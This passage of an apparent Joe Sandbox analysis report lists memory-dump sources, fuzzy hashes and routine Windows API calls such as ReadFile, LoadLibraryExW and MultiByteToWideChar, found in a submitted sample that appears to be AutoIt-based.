                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                • String ID:
                                • API String ID: 2800547568-0
                                • Opcode ID: 7b23a556f07154ec0cdde574b7ef007ffbd2665b59541c77e42247c4fa49f46a
                                • Instruction ID: 557871a5ca3449ba1ad8167dae19964375df485c7c8d6890cf1839c2aa9817b2
                                • Opcode Fuzzy Hash: 7b23a556f07154ec0cdde574b7ef007ffbd2665b59541c77e42247c4fa49f46a
                                • Instruction Fuzzy Hash: 4BF09071C00A049ADB21AB758A02F6E66E16F80734F5B824DF415AB1C1CF7CAD819B59
                                APIs
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00AA558F,?,?,?,?,?), ref: 00AA81DA
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00AA558F,?,?,?,?,?), ref: 00AA820D
                                  • Part of subcall function 00AA78AD: _memmove.LIBCMT ref: 00AA78E9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$_memmove
                                • String ID:
                                • API String ID: 3033907384-0
                                • Opcode ID: e6c1f86f7861c89bc3d82d486d7e2afd0167340d442071c43d0675616297c2df
                                • Instruction ID: 56ec7c8476be1aae8f2dcbb522fcfdb454fd4b186ea1cf56e814af6ecce830af
                                • Opcode Fuzzy Hash: e6c1f86f7861c89bc3d82d486d7e2afd0167340d442071c43d0675616297c2df
                                • Instruction Fuzzy Hash: C901AD35201104BFEB246B25DE4AF7B3B6CEB8A760F10803AFD05DE1D1EE3098408671
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4bfb57b3d0a0a8e2c0c35f59624a1e63935480550f9f07f4f11fdd11a02a03b5
                                • Instruction ID: 26d51caa4accec56dd91ea1e656f9fe757a0345d5c6a525d9637c1914e8bac0e
                                • Opcode Fuzzy Hash: 4bfb57b3d0a0a8e2c0c35f59624a1e63935480550f9f07f4f11fdd11a02a03b5
                                • Instruction Fuzzy Hash: A1516E35B00604AFCF14EB68CA95FAE77B5AF46350F148569F906AB392CB30ED00CB55
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: ab6fd76627a5ae7c550f538024095d9708897891a7e1bc3d2fbdd679136dc1ef
                                • Instruction ID: d6620a35f55571b11d5bd7662e9d01a7458d2760efb05f6de14a410cbb41997f
                                • Opcode Fuzzy Hash: ab6fd76627a5ae7c550f538024095d9708897891a7e1bc3d2fbdd679136dc1ef
                                • Instruction Fuzzy Hash: B1317079608A02DFC7259F19C990E2BF7E4FF0A310715C56DE98A8B7A5E730D881CB94
                                APIs
                                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00AA5CF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: 0f072f5b1af0b284e34205a1a1705c133264c77e11d6438aff26c726d4192636
                                • Instruction ID: a7c9b847a09701869269036cb1e58fa2061590aa6d743ebed9c37c1e146b3c9f
                                • Opcode Fuzzy Hash: 0f072f5b1af0b284e34205a1a1705c133264c77e11d6438aff26c726d4192636
                                • Instruction Fuzzy Hash: 2A316C31E00B09AFCB18DF2DC484A6DB7B1FF49320F14862AE81993754D731B960DB94
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ClearVariant
                                • String ID:
                                • API String ID: 1473721057-0
                                • Opcode ID: 2503a388df112b7d8305610ca0f288c7f7f385f47fcdd8c0681fcd84767a5b3d
                                • Instruction ID: a440efc191067b6b5a40983709082fd4a8986912949580997ea64cd7a08a72b4
                                • Opcode Fuzzy Hash: 2503a388df112b7d8305610ca0f288c7f7f385f47fcdd8c0681fcd84767a5b3d
                                • Instruction Fuzzy Hash: 8A410674604351DFDB24DF14C584B1ABBE0BF46318F1989ACE8994B3A2C772EC85CB52
                                APIs
                                  • Part of subcall function 00AA4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00AA4D4D
                                  • Part of subcall function 00AC548B: __wfsopen.LIBCMT ref: 00AC5496
                                • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4F6F
                                  • Part of subcall function 00AA4CC8: FreeLibrary.KERNEL32(00000000), ref: 00AA4D02
                                  • Part of subcall function 00AA4DD0: _memmove.LIBCMT ref: 00AA4E1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Library$Free$Load__wfsopen_memmove
                                • String ID:
                                • API String ID: 1396898556-0
                                • Opcode ID: 430193ce3620254612bba562708c016a78dd5b4982b9b1f7e811790da866ac29
                                • Instruction ID: ecd33b39168df782f42cb1ae05b7729bc2a5b902a0de19abeb4473a27b256128
                                • Opcode Fuzzy Hash: 430193ce3620254612bba562708c016a78dd5b4982b9b1f7e811790da866ac29
                                • Instruction Fuzzy Hash: BE11E731A00705AECF14AF70DD02F6E77A59F89B10F10843AF541A72C1DFB19A059B50
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ClearVariant
                                • String ID:
                                • API String ID: 1473721057-0
                                • Opcode ID: 736bc69e2578ca03fe82de79e1fbafb23e8e4c5e4ec28c7b4f382b096b144bce
                                • Instruction ID: 74128d9d6d186c91b87c9326ca80c4fcbf3e04ae5d679a776e34bf8c44e4252e
                                • Opcode Fuzzy Hash: 736bc69e2578ca03fe82de79e1fbafb23e8e4c5e4ec28c7b4f382b096b144bce
                                • Instruction Fuzzy Hash: 9C21EFB4608351DFCB24DF54C984B1ABBE0BF8A304F05896CE99A577A2D731E845CB62
                                APIs
                                • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00AA5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00AA5D76
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 48330eba1879557f305aa8893518471cccebaa1fe2222a732135c33124a9664d
                                • Instruction ID: bbd86307fd73e78508de7e1018aacb37a4b1a7ea17dde2a755561b210d17ea36
                                • Opcode Fuzzy Hash: 48330eba1879557f305aa8893518471cccebaa1fe2222a732135c33124a9664d
                                • Instruction Fuzzy Hash: 73113631600B019FD330CF25C888B66B7F9EF46760F10C92EE5AA87A90D7B1E945CB64
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: c56c3b4cee92743fd843ba2fcf40f434112ab0d27706c117a31bb8eb393c03f0
                                • Instruction ID: 24be28a47391d0a88afd7d2b783ca7145b9d9270f31d0d0df8365d1d87f2c897
                                • Opcode Fuzzy Hash: c56c3b4cee92743fd843ba2fcf40f434112ab0d27706c117a31bb8eb393c03f0
                                • Instruction Fuzzy Hash: 7701D672204701AED7205B38CC02F6BBBA8EB45760F11852EF55ACB1D1EB31E540C790
                                APIs
                                • __lock_file.LIBCMT ref: 00AC4AD6
                                  • Part of subcall function 00AC8D68: __getptd_noexit.LIBCMT ref: 00AC8D68
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __getptd_noexit__lock_file
                                • String ID:
                                • API String ID: 2597487223-0
                                • Opcode ID: 4413b42b802e405e86678f44f083e9256c86e75df05c3c49aa3c35c81ae5240e
                                • Instruction ID: 0564418430937bd52c00b3d3991f7a3dd7ddc67947fcbb10f6690cb3dd8c0b0d
                                • Opcode Fuzzy Hash: 4413b42b802e405e86678f44f083e9256c86e75df05c3c49aa3c35c81ae5240e
                                • Instruction Fuzzy Hash: C9F0FF31800208ABDF61AF648D02FAE36A0BF04365F06850CF824AA1D1CB788E50CF48
                                APIs
                                • FreeLibrary.KERNEL32(?,?,00B662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4FDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: c4a68192122ad1dd3941c4a6cd51326ff692317259fc398365bd7d6bced4b36c
                                • Instruction ID: 97686e3b04985acc752a2fe822deef66e1c65bda0720f7448c874e912e6cc007
                                • Opcode Fuzzy Hash: c4a68192122ad1dd3941c4a6cd51326ff692317259fc398365bd7d6bced4b36c
                                • Instruction Fuzzy Hash: 85F03071505B12CFC7349F64D49481ABBF1BF4972A3209A3EF1D683650C7B1A850DF40
                                APIs
                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AC09F4
                                  • Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: LongNamePath_memmove
                                • String ID:
                                • API String ID: 2514874351-0
                                • Opcode ID: d594a4bfe67177c1313ce2fb7cdb9b000e3c12d7da64da5d13a9e2646e0ab840
                                • Instruction ID: c4aa5743bd7bcaa9eb6936b41f28e1878e74b8f638c2f9c98e575b2d57d801fb
                                • Opcode Fuzzy Hash: d594a4bfe67177c1313ce2fb7cdb9b000e3c12d7da64da5d13a9e2646e0ab840
                                • Instruction Fuzzy Hash: 62E0863690422857C720D6989C05FFA77ADDF89690F0401B6FC4CD7244E9609C818690
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __fread_nolock
                                • String ID:
                                • API String ID: 2638373210-0
                                • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                • Instruction ID: cb2f83f74651949eed5b7cd9b430d568c45215397ba89e7469d559c55ca9e648
                                • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                • Instruction Fuzzy Hash: 94E092B0604B009FD7348A24D810BE377E0FB06315F00095CF29A93342EB6278418759
                                APIs
                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00ADE16B,?,?,00000000), ref: 00AA5DBF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: 12af93d967a2bcda26257adc005398f240b84385a6b7ec0ee24fb13d4f90e154
                                • Instruction ID: 0c05caf6297b6058a01ffd274c091064143dcf16b13baed78d2784198d89bedb
                                • Opcode Fuzzy Hash: 12af93d967a2bcda26257adc005398f240b84385a6b7ec0ee24fb13d4f90e154
                                • Instruction Fuzzy Hash: D6D0C77464020CBFE710DB80DC46FA9777CD705711F500194FD0467290D6B27D508795
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __wfsopen
                                • String ID:
                                • API String ID: 197181222-0
                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                • Instruction ID: 1cc97aaed509a281c0cd8bddafe48d6923b927f2d741121ebaabec8e546ef707
                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                • Instruction Fuzzy Hash: 4FB0927684020C77DE012E92ED02F593B1A9B40679F808020FB0C28162A673E6E09689
                                APIs
                                • GetLastError.KERNEL32(00000002,00000000), ref: 00B0D46A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorLast
                                • String ID:
                                • API String ID: 1452528299-0
                                • Opcode ID: d00c9ad3a31ee7440a68711139ccaeb576d207934f64f19370ebeb86e7216f4f
                                • Instruction ID: fb934d1f135f5ef594a02115cfbd5db7a0253366763db36c5a8837dbae2f9eb1
                                • Opcode Fuzzy Hash: d00c9ad3a31ee7440a68711139ccaeb576d207934f64f19370ebeb86e7216f4f
                                • Instruction Fuzzy Hash: 98714E346043018FC714EF64C991A6EBBE4EF89354F04496DF8969B2E2DB30E949CB56
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
